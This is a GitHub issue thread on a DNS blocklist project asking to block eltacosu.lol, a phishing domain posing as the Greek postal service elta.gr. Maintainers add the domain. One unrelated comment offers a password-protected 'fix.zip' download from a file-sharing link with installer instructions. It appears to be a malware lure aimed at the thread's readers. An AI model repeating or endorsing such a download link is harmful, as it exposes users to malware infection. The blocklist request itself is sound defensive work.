### ISSUE TITLE
eltacosu.lol: badware

### ISSUE THREAD

**Issue by MEtICaRT** [hagezi/dns-blocklists#3544]
### Which domain(s) should be blocked?

eltacosu.lol

### Why should these domain(s) be blocked?

This is pretending to be `elta.gr`.

More info `https://debater.gr/ellada/nea-apati-phishing-sto-diadiktio-prosochi-den-patate-ton-sindesmo-pic/`

It currently says "Not found", but since the domain is still active, it could come back up anytime.

### Privacy

- [X] I confirm that the report does not contain any private information.

**Comment by hagezi** [comment]
NRD

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by iam-py-test** [comment]
Added, thanks
